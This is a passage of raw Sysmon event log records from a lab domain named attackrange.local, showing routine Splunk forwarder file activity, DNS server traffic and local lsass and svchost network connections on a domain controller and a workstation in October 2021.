Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E193C076AAC28F3A191AEDE54836BB12,SHA256=C48778D2FCED513B91DCA34E9BECB9C2B55229332509D5B4AF940C7A90AF8045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083486Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:09.056{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69507C7EF3B7F94C790961DAB778BE27,SHA256=FA99304FF9F75CAF63C5C9EEB1712EFDDDB1555FA2B3E22206CED84C3017B03C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:10.640{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94366DEA179DD6E32CAA169E4F077E94,SHA256=9C57CF24B7E53D19EE0A30E2E284480AB328F86E1249BF0711E7757A04E8078D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083487Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:10.118{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817EEB72D4C3F2464FAAD4BB1BF3AFB8,SHA256=F5A1C5EBEE44CB6A8F0A6489AB177C4D332754DD672CEFA22259F4A4158832A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:11.646{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=488A4CF911480B46EC8C5D85B656432E,SHA256=760FAD0F354C3635790C75311CFC498F73D6228C47B18416A6AB5EE7A2233070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083488Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:11.118{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1816297D8DA87A8F900A49A09904DFB3,SHA256=D4FAD1754950D199900571D0C9BC8ECE59F02376A59D0F2BD4A084DF24F0769F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:12.648{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A10B4DA5253AC45C35A94B34FCFD4603,SHA256=24307C47EE4E8DC83862AD13FB10ECEBBE655E1F0D3DCE72C505D1761091691A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083489Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:12.134{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B5EDAA290A0F911ABE3FC28A75F67B2,SHA256=88FF3A2A9BE271412CE6AB1B6823324783CB9D88455C5C8B791D06C2A34BBB40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:10.367{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51918-false10.0.1.12-8000- 23542300x8000000000000000107596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:13.650{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B175AC4832A230FB8C08EE9A769808A0,SHA256=BB85702F01C2F6F4092C72368E1926BDF5251FFD255A84CA9E521F579B152354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083492Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:13.480{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-034MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083491Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:13.165{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75E40D0AEC959070D6EE244920889E1C,SHA256=0FB1AF23C02094DC14E0B5DF965A9AB23F7FCF65E828EC8273710CB9F456F8BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083490Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:10.720{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50173-false10.0.1.12-8000- 23542300x8000000000000000107597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:14.658{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A15ED6961250A3BF55BD8FC631407557,SHA256=29452B7731AA8FB26A7EABD9C9740FA2D2BA624F174B164822263A0F3C8492C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083494Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:14.491{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-035MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083493Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:14.193{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98295537066EB346182B41D9BA309186,SHA256=73C38F4B432C29CAD763CAA55C4199BAE5C1F871E66531E19F5ECFFB413C66F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:15.660{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B02ACE99237A7E0C85A4A99E9610C1,SHA256=7876DF9A77BD285844659B85C90A50D87DE401749786E2F91563C634EB1EFA24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083495Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:15.350{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35D084CB72D216B8F45273440F40A0B,SHA256=713CE4D2FD101C6F34F23A508B548A1EEC835F0050F5ED483CFE4A2B242CDF69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:16.665{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0F13D6F4704A3019FED5B6BE6D83CF,SHA256=CAAF6CBA93AA69FEF302FA9BB6476DE870AF4635775A3123E9254F4A78099F86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083496Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:16.365{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16108E9309D6A576749EDDA573C13BDF,SHA256=6F67EBC1EC40472BFCE6AB3E8BA36A003B608F9DCDA4C33C4ADB09A5E7ED6DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083497Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:17.383{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D85D19150A7CB8C7781DA81EAAC989,SHA256=92614D46441C3E9121DF502B471C151312F9369BEE6E62981AA3B18A5D291F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.669{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78748B9C2C244231D60610403FC86D6F,SHA256=011118FBC1F126C76A96052B47C25D560F4140FAB70642D95F8BFE70BCEE9B6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:16.289{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51919-false10.0.1.12-8000- 354300x8000000000000000107629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.022{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local59856- 354300x8000000000000000107628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.022{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51399- 354300x8000000000000000107627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.020{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local59002- 354300x8000000000000000107626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.020{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64434- 354300x8000000000000000107625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.018{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local59013- 354300x8000000000000000107624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.017{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62530- 354300x8000000000000000107623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.016{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local60012- 354300x8000000000000000107622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.015{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62326- 354300x8000000000000000107621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.013{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61400- 354300x8000000000000000107620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.011{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local49754- 354300x8000000000000000107619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.008{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local52952- 354300x8000000000000000107618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.005{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61932- 354300x8000000000000000107617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.004{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51218- 354300x8000000000000000107616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.002{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local63464- 354300x8000000000000000107615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.001{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64319- 354300x8000000000000000107614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.998{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49648- 354300x8000000000000000107613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.997{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local51219- 354300x8000000000000000107612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.995{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local58985- 354300x8000000000000000107611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.993{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local57971- 354300x8000000000000000107610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.993{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-639.attackrange.local57971-false10.0.1.14win-dc-639.attackrange.local53domain 354300x8000000000000000107609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.992{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57971-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domain 354300x8000000000000000107608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.984{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51921-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49666- 354300x8000000000000000107607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.984{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51921-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49666- 354300x8000000000000000107606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.983{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51920-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000107605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:17.983{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51920-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 23542300x8000000000000000107604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.765{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C47DAA4E6809BCB0280B03CAAA453E63,SHA256=0914F0E07C6BA95B264545A862D4F887E8CBEB193D0FB9419515C513D3E2A82B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854719739B803CB29B33D2246AA13E40,SHA256=B0666050E0273A1A3A08890A1D437670C24A9BDC0BADF6C3AC7B1D2103390214,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.672{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DE028D351CACA732029F63219DD798D,SHA256=CAA82D6BB377362DFE58C4C153669610F7EC747ADB2685207770921842128AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083499Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:18.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA736EC5BAF2D3C91C83E64CA148A18,SHA256=12316CAE964893DC8899B672D15BE5C77E173A9DBC1AC3239D68DBCC4B91F99B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083498Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:16.626{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50174-false10.0.1.12-8000- 23542300x8000000000000000107641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:19.977{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C83B3A3FCF9480C24BA235CE65696D9F,SHA256=C1B8CCA2D7FC2738AC59239235E3736853AE3C2317B170E4F62CD89A207CA1A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083501Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:19.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1357BE26AA823B0E25F4425369701F00,SHA256=4E2ADA8844F23842A4937BF83714081939F202157AE396F02F26069869CF1D0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.045{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local63077- 354300x8000000000000000107639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.044{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64262- 354300x8000000000000000107638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.042{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61003- 354300x8000000000000000107637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.040{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50110- 354300x8000000000000000107636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.039{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local49808- 354300x8000000000000000107635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.038{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58183- 354300x8000000000000000107634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.036{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local62032- 354300x8000000000000000107633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.035{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49454- 354300x8000000000000000107632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.032{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61778- 354300x8000000000000000107631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 